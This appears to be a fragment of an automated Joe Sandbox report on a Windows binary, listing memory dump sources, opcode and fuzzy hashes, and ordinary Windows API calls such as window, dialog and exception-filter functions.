• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
APIs
• GetVersionExW.KERNEL32(?), ref: 00A303ED
  • Part of subcall function 00A30469: __EH_prolog3.LIBCMT ref: 00A30470
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Similarity
• API ID: H_prolog3Version
• String ID:
• API String ID: 2775145068-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: gj
                                                                                                                                                      • API String ID: 0-4203073231
                                                                                                                                                      • Opcode ID: e61efb068adaae442e0d154f82e206b15e4628830b77e1a72a0ae9e685437055
                                                                                                                                                      • Instruction ID: 3af507ce2c858ecb93faefd2cc232db03680a36394e0259d6bf66a2f2f3dde52
                                                                                                                                                      • Opcode Fuzzy Hash: e61efb068adaae442e0d154f82e206b15e4628830b77e1a72a0ae9e685437055
                                                                                                                                                      • Instruction Fuzzy Hash: BCD114B2A083458FC354CF29D88065AFBE2BFC9308F59492EE998D7305D734A955CF86
                                                                                                                                                      APIs
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00A46445), ref: 00A46A10
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                      • Opcode ID: 1dfc6d51c36cae85748998d7bd37209dd90745009ac6fb121853290ed515ca6f
                                                                                                                                                      • Instruction ID: 068f4535d255876a3d3ca746f9ac655e4d7f7b82816fc2d5d529372abfe33618
                                                                                                                                                      • Opcode Fuzzy Hash: 1dfc6d51c36cae85748998d7bd37209dd90745009ac6fb121853290ed515ca6f
                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                      • Opcode ID: 6e253070fe2349e600aa2e71a54347680dcc278bd1e2736ae9c580aed3184a47
                                                                                                                                                      • Instruction ID: 8b9477ef29f6fd538265659b8372c17e090e80d45d9e80d153c1d32c218361b1
                                                                                                                                                      • Opcode Fuzzy Hash: 6e253070fe2349e600aa2e71a54347680dcc278bd1e2736ae9c580aed3184a47
                                                                                                                                                      • Instruction Fuzzy Hash: 4BA002705017018F9744CF755E0530A3695B9455D574581595405C5165D6254455D641
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                                                                                      • Instruction ID: 5893312c7896e5830d0cca433df7dd01157a0fe6121043b86ebf42e0e367731f
                                                                                                                                                      • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                                                                                      • Instruction Fuzzy Hash: 858207316147858FCB29CF28C5906BABBF2AF95304F18895DF9DB8B742D730A945CB21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d0985edbcc457f0ddda3a2770c218dd63492e384096512e43fe977804322315b
                                                                                                                                                      • Instruction ID: dc56de3b14604792b19287d383b1396e0925b7b71c6079997579a90c78d751a5
                                                                                                                                                      • Opcode Fuzzy Hash: d0985edbcc457f0ddda3a2770c218dd63492e384096512e43fe977804322315b
                                                                                                                                                      • Instruction Fuzzy Hash: 87823AA5D3DF895EE3039A3484021E7E3A86EF71C9F46E71FF8A431426E721A6C75601
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                                                                                      • Instruction ID: 117fdd4b0ea5df1655578cf9571b5848ed1b6403bb1b542b2b63f9e41fd5edd0
                                                                                                                                                      • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D7204716043858FCB19CF68CD906A9BBE2BF95324F18856EF89A9F346D330E945CB11
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                                                                                      • Instruction ID: d57a10073bb8adbf6dc80fa7f77868cbb64adc53f5b34fb4a37019eda37b67f0
                                                                                                                                                      • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                                                                                      • Instruction Fuzzy Hash: 4A525C72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE59697255D334EA19CB86
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9288fc6b5ee01747e6edcbc7c2316654cda351bbac2ea5f57cd7682c174ccbc0
                                                                                                                                                      • Instruction ID: 524cce61efbb54faf343ca62f5be6d0fe11207c974947f0f846ac4e635f9b53f
                                                                                                                                                      • Opcode Fuzzy Hash: 9288fc6b5ee01747e6edcbc7c2316654cda351bbac2ea5f57cd7682c174ccbc0
                                                                                                                                                      • Instruction Fuzzy Hash: 4412E2706147468FD728CF28C991BB9B7E1BF48314F108A3EF59AC7281E778A995CB11
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 39f44f2f701261c0e56e9da29fd7a4cbf035811c6f6841cea9b53a117bb4563e
                                                                                                                                                      • Instruction ID: b63a8bf2416c932ba8155d4db5407aaba6b1b45a85845dad284eceb4ea712e05
                                                                                                                                                      • Opcode Fuzzy Hash: 39f44f2f701261c0e56e9da29fd7a4cbf035811c6f6841cea9b53a117bb4563e
                                                                                                                                                      • Instruction Fuzzy Hash: B2E16CB55083918FC704CF69D89056BBBF0AF89300F46495EF9E8A7352C334EA56DB62
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: cebb41b836b5261b13714aca967af37aaf1d56c82eb4a9e1e93f5e71d2523a5e
                                                                                                                                                      • Instruction ID: 70531bf903d9cd0b886c36925dc0a12494e94236da9ddeeb64ca19c68da89466
                                                                                                                                                      • Opcode Fuzzy Hash: cebb41b836b5261b13714aca967af37aaf1d56c82eb4a9e1e93f5e71d2523a5e
                                                                                                                                                      • Instruction Fuzzy Hash: D99132722483614FDB25DF68D985BEE77E2ABA0304F14093DF9CA8B282D77498858753
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ac3b2c546284f15a74fac136595e915943e131b9b07f9b0cb886bf763deee0fb
                                                                                                                                                      • Instruction ID: b45480cf745a43392ed87c6106026de1c528965b2595a04e44edb843438ea53d
                                                                                                                                                      • Opcode Fuzzy Hash: ac3b2c546284f15a74fac136595e915943e131b9b07f9b0cb886bf763deee0fb
                                                                                                                                                      • Instruction Fuzzy Hash: 9761BC3C60260862EEF46BAC89917FE63A4DFC5734F10061AE84FDF293E2D1AD428355
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                      • Instruction ID: 9c7fcf7001384b091e486ee105bacca97e4636a394d2d99f771cd7cfc07bcb4a
                                                                                                                                                      • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                      • Instruction Fuzzy Hash: 7451A83D221745A7DF788B2D89567FE23A59BD2310F18091AE94ECB682C706ED09D731
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3d796b361636e166f6be2688513547eb431ebb37a79a458fb39f5f94fd42e791
                                                                                                                                                      • Instruction ID: 27a22d6bd31e07b958d011cc9334d642819893cfd27cd1c941ce9760b4ec250d
                                                                                                                                                      • Opcode Fuzzy Hash: 3d796b361636e166f6be2688513547eb431ebb37a79a458fb39f5f94fd42e791
                                                                                                                                                      • Instruction Fuzzy Hash: D851033150C3D58FC712DF28C5405AEBFF0AEAE718F5A4999F4E55B242D230EA4ACB52
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0aa3ef4a5cfd67fd32c5ff55700e876a0a94ef345f0eed41e57d2ab4dac9dfaf
                                                                                                                                                      • Instruction ID: b3d0b63d948680834179a69376c95e136b5029975ad3e089d957f3b467531eb4
                                                                                                                                                      • Opcode Fuzzy Hash: 0aa3ef4a5cfd67fd32c5ff55700e876a0a94ef345f0eed41e57d2ab4dac9dfaf
                                                                                                                                                      • Instruction Fuzzy Hash: B151DEB1A087119FC758CF29D48055AF7E1BF88314F058A2EF899E7340DB30E959CB96
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                      • Instruction ID: d1620241885d02d892a86e8aa8491e60995fe5d734e9070baa553edc0c682ba1
                                                                                                                                                      • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                      • Instruction Fuzzy Hash: 0531CEB16047268FCB14DF28D95116ABBE0EBA5340F144A3DF4DAC7742C775E909CB92
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                                                                                      • Instruction ID: 8086b00312692d128c202976e676945e5b957ec59c90d9a4f4e375a1de83525b
                                                                                                                                                      • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                                                                                      • Instruction Fuzzy Hash: 8B41B470505B11CFC71ADF39E5559A6B7E4FF4A700B1248AEE06A8B221EB30EA04DF59
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: b4cde4725789e360de0af1ec9ece6a236d21b9b9a29410af6375ab01e180885c
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 9611087F24414247D6148F2ED4B45BBA3A9EAC7320B6C42BED1524F6D8D222FD759900
                                                                                                                                                      APIs
                                                                                                                                                      • _swprintf.LIBCMT ref: 00A33EEA
                                                                                                                                                        • Part of subcall function 00A2F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A2F6CD
                                                                                                                                                        • Part of subcall function 00A389ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00A6E088,?,00000007,00A333E2,?,?,00000050,5C02E116), ref: 00A38A0A
                                                                                                                                                      • _strlen.LIBCMT ref: 00A33F0B
                                                                                                                                                      • SetDlgItemTextW.USER32(?,00A6919C,?), ref: 00A33F64
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A33F9A
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00A33FA6
                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A34051
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A34081
                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00A340B0
                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00A340B8
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00A340C3
                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A340F3
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A34165
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                      • String ID: $%s:$CAPTION$d
                                                                                                                                                      • API String ID: 2407758923-2512411981
                                                                                                                                                      • Opcode ID: e282c6b5d08b03ac0288913873937255d76a7b6c77206c15e65a163b87b2e6f0
                                                                                                                                                      • Instruction ID: 11b133644b6232564fd13e8c16e505dc5c55cad22c652078aeb76dca8d74952d
                                                                                                                                                      • Opcode Fuzzy Hash: e282c6b5d08b03ac0288913873937255d76a7b6c77206c15e65a163b87b2e6f0
                                                                                                                                                      • Instruction Fuzzy Hash: 3481AE72608301AFD714DFA8CD89A6FBBF9EB89704F404A2DF98497250D734E949CB52
